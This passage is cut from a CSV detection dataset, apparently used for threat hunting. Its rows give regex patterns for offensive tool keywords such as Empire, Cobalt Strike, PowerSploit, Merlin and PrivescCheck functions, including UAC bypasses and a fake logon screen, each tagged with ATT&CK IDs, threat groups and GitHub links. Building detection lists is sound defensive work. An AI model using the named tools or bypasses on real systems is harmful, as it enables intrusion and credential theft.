Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EndpointProtectionCheck*",".{0,1000}Invoke\-EndpointProtectionCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-EnumerateAzureBlobs.ps1*",".{0,1000}Invoke\-EnumerateAzureBlobs\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation 
tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*Invoke-EnumerateAzureSubDomains.ps1*",".{0,1000}Invoke\-EnumerateAzureSubDomains\.ps1.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*invokeenumeratelocaladmin*",".{0,1000}invokeenumeratelocaladmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - 
T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Invoke-EnumerateLocalAdmin*",".{0,1000}Invoke\-EnumerateLocalAdmin.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*Invoke-EnvBypass*",".{0,1000}Invoke\-EnvBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUACTokenManipulation.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EnvBypass.*",".{0,1000}Invoke\-EnvBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 
- T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-EnvBypass.ps1*",".{0,1000}Invoke\-EnvBypass\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1125","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EssessAgress*",".{0,1000}Invoke\-EssessAgress.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*invoke-eternalblue*",".{0,1000}invoke\-eternalblue.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - 
T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Invoke-EventHunter*",".{0,1000}Invoke\-EventHunter.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-eventhunter*",".{0,1000}invoke\-eventhunter.{0,1000}","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","9","835","111","2024-04-12T10:12:03Z","2016-07-06T13:25:09Z" "*Invoke-EventViewer *.exe*",".{0,1000}Invoke\-EventViewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" 
"*Invoke-EventViewer.ps1*",".{0,1000}Invoke\-EventViewer\.ps1.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","1","N/A","10","2","157","22","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","1","N/A","10","10","852","195","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-EventVwrBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-EventVwrBypass*",".{0,1000}Invoke\-EventVwrBypass.{0,1000}","offensive_tool_keyword","PickleC2","PickleC2 is a post-exploitation and Lateral Movements framework","T1059.006 - T1021 - T1071 - T1550 - T1560 - T1570","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/xRET2pwn/PickleC2","1","0","N/A","10","10","82","19","2021-07-26T21:12:04Z","2021-07-13T09:16:19Z" 
"*Invoke-ExcelMacroPivot*",".{0,1000}Invoke\-ExcelMacroPivot.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExcelMacroPivot.ps1*",".{0,1000}Invoke\-ExcelMacroPivot\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExecuteMSBuild*",".{0,1000}Invoke\-ExecuteMSBuild.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-ExecuteMSBuild.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ExecuteMSBuild.ps1*",".{0,1000}Invoke\-ExecuteMSBuild\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1090","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Invoke-ExecutionCommand.json*",".{0,1000}Invoke\-ExecutionCommand\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*Invoke-ExploitableLeakedHandlesCheck*",".{0,1000}Invoke\-ExploitableLeakedHandlesCheck.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/itm4n/PrivescCheck","1","1","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Invoke-Eyewitness*",".{0,1000}Invoke\-Eyewitness.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-FakeLogonScreen*",".{0,1000}Invoke\-FakeLogonScreen.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*Invoke-Farmer*",".{0,1000}Invoke\-Farmer.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1405","295","2024-04-24T21:23:25Z","2020-04-06T16:34:52Z" "*invokefilefinder*",".{0,1000}invokefilefinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","63","18","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-FileFinder*",".{0,1000}Invoke\-FileFinder.{0,1000}","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 